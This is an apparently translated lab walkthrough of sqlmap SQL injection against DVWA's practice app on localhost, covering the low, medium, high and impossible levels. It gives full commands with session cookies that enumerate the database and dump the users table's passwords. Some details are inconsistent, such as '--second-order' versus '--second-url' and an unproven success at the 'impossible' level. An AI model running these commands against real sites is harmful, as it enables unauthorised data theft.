DVWA---Sqlmap of SQL injection

Table of contents

1. Sqlmap

1 Introduction

2. Basic steps

3. command

2. SQL Injection

1.low

 2.Medium.

 3.high

 4.impossible

---

1. Sqlmap

1 Introduction

        Sqlmap is an automated SQL injection tool. Its main function is to scan, find and exploit SQL injection vulnerabilities in a given URL. The currently supported databases are MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite , Firebird, Sybase and SAP MaxDB.

Five unique SQL injection techniques are employed, namely:

• Boolean-based blind injection, that is, the injection that can judge whether the condition is true or false according to the returned page.
• Blind injection based on time, that is, you cannot judge any information based on the content returned by the page, and use conditional statements to check whether the time delay statement is executed (that is, whether the page return time has increased).
• Based on error injection, that is, the page will return an error message, or directly return the result of the injected statement to the page.
• Joint query injection can be injected in the case of union.
• Heap query injection, which can execute the injection of multiple statements at the same time.
   

2. Basic steps

    View the relevant parameters of sqlmap, the command format is: sqlmap -h
    Find an available website, determine the website database type, the command format is: sqlmap -u
    After confirming that the database type is mysql, check the existing database, the command format is: sqlmap -u Target URL – dbs
    View the tables existing in the database, the command format is: sqlmap -u target URL –tables -D database name
    to get the fields in the table, the command format is: sqlmap -u target URL – columns -T table name -D database Guess the name
    to extract the field and view the storage content in the table. The command format is: sqlmap -u target URL – dump -C field name-T table name-D database name

Before that, there are a few little knowledge points

    sqlmap requires us to enter parameters, the most important of which is the target address of SQL injection. First of all, it is necessary to judge whether the target address of the test needs to log in. If it needs to log in, pass the login Cookie as a parameter to sqlmap.
        python sqlmap.py -u "target address" --cookie="cookie value" --batch
    –batch is used to indicate automatic operation, otherwise each step needs to be confirmed;
    –current-bd to view the current database name
    -D DB to specify DBMS database to enumerate
    -T TBL specifies the DBMS data table to enumerate
    -C COL specifies the DBMS data column to enumerate
    -X EXCLUDECOL specifies the DBMS data column to exclude
    -U USER specifies the DBMS user to enumerate

3. command

sqlmap.py -u "http://xxx//"  --batch

sqlmap.py -u "http://xxx//"  --cookie="获取的cookie" 

#查询数据库
sqlmap.py -u "http://xxx//"  --cookie="获取的cookie"  -dbs

#查看dvwa数据库的表 
sqlmap.py -u "http://xxx//"  --cookie="获取的cookie"  -D data -tables

#查看表中的字段名 
sqlmap.py -u "http://xxx//"  --cookie="获取的cookie"  -D data -T users --columns

#获取字段的信息
sqlmap.py -u "http://xxx//"  --cookie="获取的cookie"  -D data -T users -C user,password --dump

2. SQL Injection

1.low

We enter id=1 to get the URL url 

sqlmap performs sql injection and checks the information.

sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --batch

It is found that login is required, and cookies are obtained on the web page.

 view database

sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -dbs

 

 View the tables of the dvwa database

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -tables

 View the field names in the table

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users --columns

 Get field information

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=low" --batch -D dvwa -T users -C user,password --dump

You can see that the username and password have been queried by us.

 2.Medium.

We enter id=1, url does not respond

 We use burpsuit to capture and analyze the data submitted by post.

Here, the post method is used for transmission, so we need to use the --data parameter to import the data here

 view information

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch

 

view database

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -dbs

View the tables under the dvwa database

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -tables

View field name

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users --columns

 Get the information in the field

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/#" --data="id=1&Submit=Submit" --cookie="PHPSESSID=keuqaijadcudeooggiv3ch4gom;security=medium" --batch -D dvwa -T users -C user,password --dump

 3.high

        We found that after clicking, we will jump to another page, so if we want to use sqlmap for blasting, we also need to introduce a knowledge point – second-order (second-order sql injection). Sometimes the data input at the injection point does not look at the returned
        results It is not the current page, but another page. At this time, you need to specify which page to get the response to judge whether it is true or false.
--second-order is followed by a URL address to judge the page.

Use burpsuite to capture packets, because the value of post or get cannot be obtained on the page here.

sqlmap>python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch 

 The following is roughly the same as the low medium level

get data

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --second-url "http://127.0.0.1/dvwa/vulnerabilities/sqli/" --batch -D dvwa -T users -C user,password --dump

 4.impossible

Token verification is added to this level, and we use bp to capture packets to obtain

 Run sqlmap, try it, and it succeeds.

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=f237dc0df1d6cdf589f09179a99fa7aa#" --cookie="security=impossible;PHPSESSID=keuqaijadcudeooggiv3ch4gom" --batch

 look at the data

python sqlmap.py "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=581a16aa4511d8c46a3ea1834973122a#" --cookie="security=impossible;PHPSESSID=0mcqc7ludqslr2se50lsaas3g0" --batch -D dvwa -T users -C user,password --dump